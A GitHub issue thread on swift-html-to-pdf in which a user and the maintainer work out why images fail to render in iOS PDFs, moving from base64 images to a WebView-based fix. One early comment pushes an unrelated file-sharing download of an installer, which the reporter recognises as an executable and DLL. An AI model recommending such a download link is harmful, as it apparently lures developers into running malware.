### ISSUE TITLE
Images are Not Being Rendered on The Generated PDF

### ISSUE THREAD

**Issue by jonathansds** [coenttb/swift-html-to-pdf#2]
Hi there! Firstly, thanks for the awesome library! It's very straightforward to use. Appreciate it!

I noticed that images are not being rendered on the generated PDF and it might be because the "baseURL" attribute from "PDFConfiguration" seems not be used when the lib is used on iOS platform. It seems to be used only for macOS so the relative paths for the images are not being resolved.

I had a look but I am not sure how to fix it as you are not using WKWebView for iOS like you are for macOS. If you point me to the right direction I can create a PR for this. :)

Again, thanks for the awesome work!

**Comment by mahato098** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer

**Comment by jonathansds** [comment]
> try this https://gofile.io/d/yMHabA select the desired compiler in the installer

I am unable to download it. It's being blocked. Would you be able to provide the fix as a text here through messages?

**Comment by jonathansds** [comment]
> try this https://gofile.io/d/yMHabA select the desired compiler in the installer

A .exe file and a DLL? Hahahah For real!!?

**Comment by coenttb** [comment]
Thank you for bringing this up. I did a quick check, and it looks like UIMarkupRender doesn’t support rendering images with relative or absolute paths.

This article suggests using base64-encoded images, which might solve your issue. Could you give that a try? Here’s the link: https://samwize.com/2019/07/02/how-to-generate-pdf-with-images/

While the article also mentions using a webview for generating PDFs from HTML, that would likely require reworking the concurrency mechanisms currently in place for NSPrintOperation to also work for UIMarkupTextPrintFormatter. From my testing, this approach would likely come with a significant performance hit. However, if you manage to get it working with a performant passing test, I’d be happy to review and accept a PR.

Let me know how it goes!

**Comment by coenttb** [comment]
Additionally, if you use [swift-html](https://github.com/coenttb/swift-html), you can probably do something like this:

```
import Foundation
import HTML

extension Image {
    public init?(base64EncodedFromURL relativeURL: String, description: String) {
        guard let imageURL = Bundle.module.url(forResource: relativeURL, withExtension: nil),
              let imageData = try? Data(contentsOf: imageURL) else {
            return nil
        }
        
        let base64String = imageData.base64EncodedString()
        let mimeType = Image.mimeTypeForImage(relativeURL: relativeURL)
        let dataURL = "data:\(mimeType);base64,\(base64String)"
        
        self.init(source: dataURL, description: description)
    }
    
    private static func mimeTypeForImage(relativeURL: String) -> String {
        let pathExtension = (relativeURL as NSString).pathExtension.lowercased()
        switch pathExtension {
        case "jpg", "jpeg":
            return "image/jpeg"
        case "png":
            return "image/png"
        case "gif":
            return "image/gif"
        case "svg":
            return "image/svg+xml"
        default:
            return "application/octet-stream"
        }
    }
}
```

**Comment by jonathansds** [comment]
I am being unlucky with the base64 approach. The result html is correct and the images are rendered when opening it with a browser but when using:

    `try await fullHTMLString.print(
            to: fileURL
            configuration: .init(
                margins: .init(top: 5, left: 10, bottom: 5, right: 10),
                paperSize: .a4(),
                baseURL: Bundle.module.resourceURL
            )
        )`
        
The result PDF just won't render the images...
Here is the result html I am calling the "print" method from (changed the extension to txt just to be able to upload it here):

[test.txt](https://github.com/user-attachments/files/16914649/test.txt)

**Comment by coenttb** [comment]
I can confirm that the image renders correctly when viewed in a browser on my end, too.

Additionally, I found some helpful insights in this [StackOverflow post](https://stackoverflow.com/questions/40239515/uimarkuptextprintformatter-never-renders-base64-images). The post suggests that the PDF export may occur before the rendering process is fully complete, and introducing a delay could resolve the issue. This might not be too much of a performance cost if we can implement it elegantly. I recommend reading the full post for more details.

It may take me a while to investigate this further, so I truly appreciate your continued contributions in the meantime.

**Comment by jonathansds** [comment]
I can confirm that the delay approach actually works (with base64 images). I will perform some tests to see if it's possible to also render the images without the need to parse them to base64 just so we give the option to users to use either. Them I will try to figure out a way to just "wait" for the necessary time (which will depend on image size, resources, etc). 

I will keep this thread updated with my findings in the meantime :)

**Comment by coenttb** [comment]
That's great, well done! Looking forward to the PR.

**Comment by jonathansds** [comment]
@coenttb I am now adding tests, I see it's not compiling due to not finding the module for "import Testing". 
Is it necessary?

**Comment by coenttb** [comment]
That's the new Swift Testing. It runs on the Xcode 16 betas. This is releasing very shortly so I'd rather not rewrite it to XCTest.

**Comment by jonathansds** [comment]
Gotcha. How can I run the tests? It's not compiling.. :/

**Comment by jonathansds** [comment]
So, I wasn't able to figure out a way to calculate the exact amount of time needed to render the images before processing the file with UIMarkupTextPrintFormatter. The way I found was to load the file in a WebView (with frame: .zero) and monitor the loading of the content through "webView didFinish". Then process it with "webView.viewPrintFormatter()".

This only happens when the html has images. Otherwise, UIMarkupTextPrintFormatter is used instead.

I duplicated the test cases in XCTest format just to re-run them. We should delete the file after XCode 16 releases.

The PR is open :)
